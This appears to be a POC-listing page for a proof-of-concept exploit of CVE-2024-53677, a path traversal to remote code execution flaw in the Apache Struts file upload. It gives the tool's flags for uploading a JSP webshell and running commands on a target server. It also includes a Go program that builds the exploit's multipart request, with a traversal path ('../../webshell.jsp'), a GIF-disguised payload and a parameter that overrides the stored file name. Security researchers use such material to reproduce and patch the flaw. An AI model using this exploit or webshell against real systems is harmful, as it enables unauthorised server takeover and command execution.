Related vulnerability
Title:
Apache Struts security vulnerability
(CVE-2024-53677)
Description: Apache Struts is an open-source project of the Apache Foundation (USA): an open-source MVC framework for building enterprise-grade Java web applications, offered mainly as two framework products, Struts 1 and Struts 2. Apache Struts versions from 2.0.0 up to, but not including, 6.4.0 are affected by a security vulnerability that stems from a flaw in the file-upload logic.
Description
a proof of concept of CVE-2024-53677
Introduction
# CVE-2024-53677
A fairly old vulnerability affecting `Apache Struts` that leads to LFI (path traversal through the file-upload logic) and remote code execution.
## For more information about the vulnerability, see this blog post:
[Apache Struts path traversal → RCE (CVE-2024-53677)](https://www.sonicwall.com/blog/apache-struts-path-traversal-to-rce-cve-2024-53677)
## POC usage
I have spent a lot of time making this as customizable as possible, because when I first encountered this CVE I did not find a good source that implemented it correctly.
Most of the flags have default values, so do not be discouraged by the number of flags.
```bash
git clone https://github.com/Cythonic1/CVE-2024-53677-POC
cd CVE-2024-53677-POC
go run . -h
```
```bash
-command string
command to execute on the server default: whoami
-end-point string
post endpoint default to: upload.action
-file-location string
where to save the file into the server default: what test function return
-lfi-param string
Parameter name for LFI testing default: top.UploadFileName
-payload-file string
Path to the payload file default: ./shell.jsp
-payload-file-name string
name of the payload it self default: shell.jsp
-payload-param string
Parameter name for payload injection default: Upload
-test-file-name string
name of the testfile it self default: testfile.txt
-testing-file string
File used for testing default: ./testfile.txt
-url string
Target base URL (format http://strutted.htb/) do not forgot the [/] at the end
```
All of these flags have default values. I also implemented a test function that uploads a harmless test file to find out where uploaded files end up on the server; it is user-configurable as well (see `-testing-file`, `-test-file-name` and `-file-location`, whose default is whatever the test function returns).
### Basic usage
```bash
go run . -url http://127.0.0.1:8080/ -end-point upload.action
```
Keep the trailing `/` on `-url`, as the help text asks. If your checkout ships the payload as `webshell.jsp` rather than the default `./shell.jsp`, either rename it or pass `-payload-file ./webshell.jsp -payload-file-name webshell.jsp`.
# NOTES.
A few things to note.
1. The default payload is in GIF format and is sent with a gif content type; if that needs to change, it is the only option for which you have to edit the code rather than pass a flag.
2. The test function may produce wrong assumptions, so do not rely on it 100%.
3. You may need to run the exploit more than once (at least twice), because I noticed that the first time the payload was uploaded, it was not found on the very next request.
So keep that in mind.
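The flag list and the notes above describe the request the POC sends without showing it: a multipart POST to `upload.action` whose file part is named `Upload` and carries the payload as `image/gif`, plus a plain field `top.UploadFileName` that overrides the name under which the upload is stored. The following Go program is an added example written for this page, not code from the `CVE-2024-53677-POC` repository; it builds that request and decodes it again the way a server would, so the body can be inspected offline. The parameter names and the GIF content type come from the README; the traversal path `../../webshell.jsp`, the `GIF89a` prefix and the JSP body are assumptions constructed for the example, and the follow-up request that runs `-command` is not shown because the page does not describe how the web shell receives it.

```go
package main

import (
	"bytes"
	"fmt"
	"io"
	"mime"
	"mime/multipart"
	"net/http"
	"net/textproto"
	"strings"
)

// UploadOptions mirrors the POC flags from the README's -h output.
type UploadOptions struct {
	BaseURL      string // -url, trailing slash included as the README asks
	Endpoint     string // -end-point, default "upload.action"
	PayloadParam string // -payload-param, default "Upload" (the file part)
	LFIParam     string // -lfi-param, default "top.UploadFileName" (overrides the stored name)
	PayloadName  string // -payload-file-name, the filename sent in the part header
	TargetPath   string // ASSUMPTION: traversal path sent in LFIParam
	Payload      []byte // -payload-file contents
}

// gifHeader is prepended so the part looks like a GIF (README note 1); the
// exact magic bytes are an assumption, the POC ships its own payload file.
var gifHeader = []byte("GIF89a")

// BuildUploadBody builds the multipart/form-data body: one file part carrying
// the payload as image/gif, then one plain field that overrides the file name.
// It returns the body and the Content-Type header carrying the boundary.
func BuildUploadBody(o UploadOptions) ([]byte, string, error) {
	var buf bytes.Buffer
	w := multipart.NewWriter(&buf)
	h := make(textproto.MIMEHeader)
	h.Set("Content-Disposition",
		fmt.Sprintf(`form-data; name="%s"; filename="%s"`, o.PayloadParam, o.PayloadName))
	h.Set("Content-Type", "image/gif")
	part, err := w.CreatePart(h)
	if err != nil {
		return nil, "", err
	}
	payload := o.Payload
	if !bytes.HasPrefix(payload, gifHeader) { // do not double-prefix a real GIF
		payload = append(append([]byte{}, gifHeader...), payload...)
	}
	if _, err := part.Write(payload); err != nil {
		return nil, "", err
	}
	if err := w.WriteField(o.LFIParam, o.TargetPath); err != nil {
		return nil, "", err
	}
	if err := w.Close(); err != nil {
		return nil, "", err
	}
	return buf.Bytes(), w.FormDataContentType(), nil
}

// NewUploadRequest wraps the body in a POST to BaseURL+Endpoint; nothing is sent.
func NewUploadRequest(o UploadOptions) (*http.Request, error) {
	body, ctype, err := BuildUploadBody(o)
	if err != nil {
		return nil, err
	}
	target := strings.TrimRight(o.BaseURL, "/") + "/" + o.Endpoint
	req, err := http.NewRequest(http.MethodPost, target, bytes.NewReader(body))
	if err != nil {
		return nil, err
	}
	req.Header.Set("Content-Type", ctype)
	return req, nil
}

// UploadPart is one decoded part of the body, keyed by form field name.
type UploadPart struct {
	FileName, ContentType string
	Data                  []byte
}

// ParseUploadBody decodes the body back into parts, as a server would see them.
func ParseUploadBody(body []byte, ctype string) (map[string]UploadPart, error) {
	_, params, err := mime.ParseMediaType(ctype)
	if err != nil {
		return nil, err
	}
	r := multipart.NewReader(bytes.NewReader(body), params["boundary"])
	parts := map[string]UploadPart{}
	for {
		p, err := r.NextPart()
		if err == io.EOF {
			return parts, nil
		}
		if err != nil {
			return nil, err
		}
		data, err := io.ReadAll(p)
		if err != nil {
			return nil, err
		}
		parts[p.FormName()] = UploadPart{p.FileName(), p.Header.Get("Content-Type"), data}
	}
}

// SampleOptions is constructed input: README defaults plus an assumed traversal path.
func SampleOptions() UploadOptions {
	return UploadOptions{
		BaseURL: "http://127.0.0.1:8080/", Endpoint: "upload.action",
		PayloadParam: "Upload", LFIParam: "top.UploadFileName",
		PayloadName: "webshell.jsp", TargetPath: "../../webshell.jsp",
		Payload: []byte(`<% out.println("constructed sample payload"); %>`),
	}
}

func main() { // dry run: print the request instead of sending it
	req, err := NewUploadRequest(SampleOptions())
	if err != nil {
		panic(err)
	}
	body, _ := io.ReadAll(req.Body)
	fmt.Printf("%s %s\nContent-Type: %s\n\n%s", req.Method, req.URL, req.Header.Get("Content-Type"), body)
}
```

Running it prints the exact bytes that would go on the wire, which is the first thing to check when the exploit "works once and not the next time" as in note 3: confirm the override field and the `image/gif` part are both present before blaming the server. Swap `bytes.NewReader(body)` for a real `http.Client` call only against a target you are authorised to test.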
# Contributions.
Feel free to modify or add to the exploit ♥️.
# Resources.
[Vulnerable docker image](https://github.com/cloudwafs/s2-067-CVE-2024-53677/tree/main)
[more info about the exploit](https://www.sonicwall.com/blog/apache-struts-path-traversal-to-rce-cve-2024-53677)
File snapshot
[4.0K] /data/pocs/6681db5bb4c7d80f9ad68b77931a78507aef557b
├── [ 33] go.mod
├── [1.0K] LICENCE
├── [6.3K] main.go
├── [2.5K] README.md
├── [ 54] testfile.txt
└── [2.7K] webshell.jsp
0 directories, 6 files
Remarks
1. It is recommended to access the POC through its original source first.
2. If the source has gone offline or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.